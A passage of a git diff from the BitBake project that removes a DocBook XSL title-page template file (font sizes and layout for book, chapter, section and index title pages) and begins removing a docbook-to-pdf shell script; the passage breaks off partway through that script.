-<!ENTITY hsize3 "17.28pt">
-<!ENTITY hsize4 "20.736pt">
-<!ENTITY hsize5 "24.8832pt">
-<!ENTITY hsize0space "7.5pt"> <!-- 0.75 * hsize0 -->
-<!ENTITY hsize1space "9pt"> <!-- 0.75 * hsize1 -->
-<!ENTITY hsize2space "10.8pt"> <!-- 0.75 * hsize2 -->
-<!ENTITY hsize3space "12.96pt"> <!-- 0.75 * hsize3 -->
-<!ENTITY hsize4space "15.552pt"> <!-- 0.75 * hsize4 -->
-<!ENTITY hsize5space "18.6624pt"> <!-- 0.75 * hsize5 -->
-]>
-<t:templates xmlns:t="http://nwalsh.com/docbook/xsl/template/1.0"
- xmlns:param="http://nwalsh.com/docbook/xsl/template/1.0/param"
- xmlns:fo="http://www.w3.org/1999/XSL/Format"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-
-<!-- ********************************************************************
- $Id: titlepage.templates.xml,v 1.23 2003/12/16 00:30:49 bobstayton Exp $
- ********************************************************************
-
- This file is part of the DocBook XSL Stylesheet distribution.
- See ../README or http://docbook.sf.net/ for copyright
- and other information.
-
- ******************************************************************** -->
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="article" t:wrapper="fo:block"
- font-family="{$title.fontset}">
-
- <t:titlepage-content t:side="recto"
- text-align="center">
-
- <mediaobject/>
-
- <title t:named-template="component.title"
- param:node="ancestor-or-self::article[1]"
- keep-with-next="always"
- font-size="&hsize5;"
- font-weight="bold"/>
-
- <subtitle param:node="ancestor-or-self::article[1]"
- keep-with-next="always"
- font-size="&hsize3;"
- font-weight="bold"
- space-after="0.8em"/>
-
- <corpauthor space-before="0.5em"
- font-size="&hsize3;"/>
- <authorgroup space-before="0.5em"
- font-size="&hsize2;"/>
- <author space-before="0.5em"
- font-size="&hsize2;"
- space-after="0.8em"/>
-
- <email font-size="&hsize2;"/>
-
- <othercredit space-before="0.5em"/>
- <releaseinfo space-before="0.5em"/>
- <copyright space-before="0.5em"/>
- <legalnotice text-align="start"
- margin-left="0.5in"
- margin-right="0.5in"
- font-family="{$body.fontset}"/>
- <pubdate space-before="0.5em"/>
- <para></para>
- <revision space-before="0.5em"/>
- <revhistory space-before="0.5em"/>
- <abstract space-before="0.5em"
- text-align="start"
- margin-left="0.5in"
- margin-right="0.5in"
- font-family="{$body.fontset}"/>
-
- <para></para>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="set" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:named-template="division.title"
- param:node="ancestor-or-self::set[1]"
- text-align="center"
- font-size="&hsize5;"
- space-before="&hsize5space;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"
- text-align="center"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="book" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
-
- <mediaobject/>
-
-<!--
-
-# If you leave this block of code in then the text title in the
-# <title>BitBake User Manual</title> statement of the
-# bitbake-user-manual.xml file is rendered on the title page below the
-# image. Commenting it out gets it out of there yet allows it
-# to be retained in the tab text for the HTML version of the
-# manual.
-
- <title
- t:named-template="division.title"
- param:node="ancestor-or-self::book[1]"
- text-align="center"
- font-size="&hsize5;"
- space-before="&hsize5space;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
--->
- <subtitle
- text-align="center"
- font-size="&hsize4;"
- space-before="&hsize4space;"
- font-family="{$title.fontset}"/>
- <corpauthor font-size="&hsize3;"
- keep-with-next="always"
- space-before="2in"/>
- <authorgroup space-before="2in"/>
- <author font-size="&hsize3;"
- space-before="&hsize2space;"
- keep-with-next="always"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
-<!--
-# If you leave this block of code in then the text title in the
-# <title>BitBake User Manual</title> statement of the
-# bitbake-user-manual.xml file is rendered on the title page below the
-# image. Commenting it out gets it out of there yet allows it
-# to be retained in the tab text for the HTML version of the
-# manual.
-
- <title
- t:named-template="book.verso.title"
- font-size="&hsize2;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
--->
- <corpauthor/>
- <authorgroup t:named-template="verso.authorgroup"/>
- <author/>
- <othercredit/>
- <pubdate space-before="1em"/>
- <copyright/>
- <abstract/>
- <legalnotice font-size="8pt"/>
- </t:titlepage-content>
-
- <t:titlepage-separator>
- <fo:block break-after="page"/>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- <fo:block break-after="page"/>
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="part" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:named-template="division.title"
- param:node="ancestor-or-self::part[1]"
- text-align="center"
- font-size="&hsize5;"
- space-before="&hsize5space;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- <subtitle
- text-align="center"
- font-size="&hsize4;"
- space-before="&hsize4space;"
- font-weight='bold'
- font-style='italic'
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="partintro" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- text-align="center"
- font-size="&hsize5;"
- font-weight="bold"
- space-before="1em"
- font-family="{$title.fontset}"/>
- <subtitle
- text-align="center"
- font-size="&hsize2;"
- font-weight="bold"
- font-style="italic"
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="reference" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:named-template="division.title"
- param:node="ancestor-or-self::reference[1]"
- text-align="center"
- font-size="&hsize5;"
- space-before="&hsize5space;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"
- text-align="center"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsynopsisdiv" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsection" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsect1" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsect2" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsect3" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="dedication" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="component.title"
- param:node="ancestor-or-self::dedication[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize5;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="preface" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="component.title"
- param:node="ancestor-or-self::preface[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize5;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="chapter" t:wrapper="fo:block"
- font-family="{$title.fontset}">
- <t:titlepage-content t:side="recto" margin-left="{$title.margin.left}">
- <title t:named-template="component.title"
- param:node="ancestor-or-self::chapter[1]"
- font-size="&hsize5;"
- font-weight="bold"/>
-
- <subtitle space-before="0.5em"
- font-style="italic"
- font-size="&hsize2;"
- font-weight="bold"/>
-
- <corpauthor space-before="0.5em"
- space-after="0.5em"
- font-size="&hsize2;"/>
-
- <authorgroup space-before="0.5em"
- space-after="0.5em"
- font-size="&hsize2;"/>
-
- <author space-before="0.5em"
- space-after="0.5em"
- font-size="&hsize2;"/>
-
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="appendix" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:named-template="component.title"
- param:node="ancestor-or-self::appendix[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize5;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="section" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- margin-left="{$title.margin.left}"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect1" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- margin-left="{$title.margin.left}"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect2" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- margin-left="{$title.margin.left}"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect3" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- margin-left="{$title.margin.left}"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect4" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- margin-left="{$title.margin.left}"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect5" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- margin-left="{$title.margin.left}"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="simplesect" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- margin-left="{$title.margin.left}"
- font-family="{$title.fontset}"/>
- <subtitle
- font-family="{$title.fontset}"/>
- <corpauthor/>
- <authorgroup/>
- <author/>
- <othercredit/>
- <releaseinfo/>
- <copyright/>
- <legalnotice/>
- <pubdate/>
- <revision/>
- <revhistory/>
- <abstract/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="bibliography" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="component.title"
- param:node="ancestor-or-self::bibliography[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize5;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="bibliodiv" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title t:named-template="component.title"
- param:node="ancestor-or-self::bibliodiv[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize4;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="glossary" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="component.title"
- param:node="ancestor-or-self::glossary[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize5;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="glossdiv" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title t:named-template="component.title"
- param:node="ancestor-or-self::glossdiv[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize4;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="index" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="component.title"
- param:node="ancestor-or-self::index[1]"
- param:pagewide="1"
- margin-left="0pt"
- font-size="&hsize5;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
- <!-- The indexdiv.title template is used so that manual and -->
- <!-- automatically generated indexdiv titles get the same -->
- <!-- formatting. -->
-
- <t:titlepage t:element="indexdiv" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title t:force="1"
- t:named-template="indexdiv.title"
- param:title="title"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="setindex" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="component.title"
- param:node="ancestor-or-self::setindex[1]"
- param:pagewide="1"
- margin-left="0pt"
- font-size="&hsize5;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="colophon" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="component.title"
- param:node="ancestor-or-self::colophon[1]"
- margin-left="{$title.margin.left}"
- font-size="&hsize5;"
- font-family="{$title.fontset}"
- font-weight="bold"/>
- <subtitle
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
- <t:titlepage t:element="table.of.contents" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="gentext"
- param:key="'TableofContents'"
- space-before.minimum="1em"
- space-before.optimum="1.5em"
- space-before.maximum="2em"
- space-after="0.5em"
- margin-left="{$title.margin.left}"
- font-size="&hsize3;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
- <t:titlepage t:element="list.of.tables" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="gentext"
- param:key="'ListofTables'"
- space-before.minimum="1em"
- space-before.optimum="1.5em"
- space-before.maximum="2em"
- space-after="0.5em"
- margin-left="{$title.margin.left}"
- font-size="&hsize3;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
- <t:titlepage t:element="list.of.figures" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="gentext"
- param:key="'ListofFigures'"
- space-before.minimum="1em"
- space-before.optimum="1.5em"
- space-before.maximum="2em"
- space-after="0.5em"
- margin-left="{$title.margin.left}"
- font-size="&hsize3;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
- <t:titlepage t:element="list.of.examples" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="gentext"
- param:key="'ListofExamples'"
- space-before.minimum="1em"
- space-before.optimum="1.5em"
- space-before.maximum="2em"
- space-after="0.5em"
- margin-left="{$title.margin.left}"
- font-size="&hsize3;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
- <t:titlepage t:element="list.of.equations" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="gentext"
- param:key="'ListofEquations'"
- space-before.minimum="1em"
- space-before.optimum="1.5em"
- space-before.maximum="2em"
- space-after="0.5em"
- margin-left="{$title.margin.left}"
- font-size="&hsize3;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
- <t:titlepage t:element="list.of.procedures" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="gentext"
- param:key="'ListofProcedures'"
- space-before.minimum="1em"
- space-before.optimum="1.5em"
- space-before.maximum="2em"
- space-after="0.5em"
- margin-left="{$title.margin.left}"
- font-size="&hsize3;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
- <t:titlepage t:element="list.of.unknowns" t:wrapper="fo:block">
- <t:titlepage-content t:side="recto">
- <title
- t:force="1"
- t:named-template="gentext"
- param:key="'ListofUnknown'"
- space-before.minimum="1em"
- space-before.optimum="1.5em"
- space-before.maximum="2em"
- space-after="0.5em"
- margin-left="{$title.margin.left}"
- font-size="&hsize3;"
- font-weight="bold"
- font-family="{$title.fontset}"/>
- </t:titlepage-content>
-
- <t:titlepage-content t:side="verso">
- </t:titlepage-content>
-
- <t:titlepage-separator>
- </t:titlepage-separator>
-
- <t:titlepage-before t:side="recto">
- </t:titlepage-before>
-
- <t:titlepage-before t:side="verso">
- </t:titlepage-before>
- </t:titlepage>
-
-<!-- ==================================================================== -->
-
-</t:templates>
diff --git a/bitbake/doc/tools/docbook-to-pdf b/bitbake/doc/tools/docbook-to-pdf
deleted file mode 100755
index 558ded9e0b..0000000000
--- a/bitbake/doc/tools/docbook-to-pdf
+++ /dev/null
@@ -1,51 +0,0 @@
-#!/bin/sh
-
-if [ -z "$1" -o -z "$2" ]; then
- echo "usage: [-v] $0 <docbook file> <templatedir>"
- echo
- echo "*NOTE* you need xsltproc, fop and nwalsh docbook stylesheets"
- echo " installed for this to work!"
- echo
- exit 0
-fi
-
-FO=`echo $1 | sed s/.xml/.fo/` || exit 1
-PDF=`echo $1 | sed s/.xml/.pdf/` || exit 1
-TEMPLATEDIR=$2
-
-##
-# These URI should be rewritten by your distribution's xml catalog to
-# match your localy installed XSL stylesheets.
-XSL_BASE_URI="http://docbook.sourceforge.net/release/xsl/current"
-
-# Creates a temporary XSL stylesheet based on titlepage.xsl
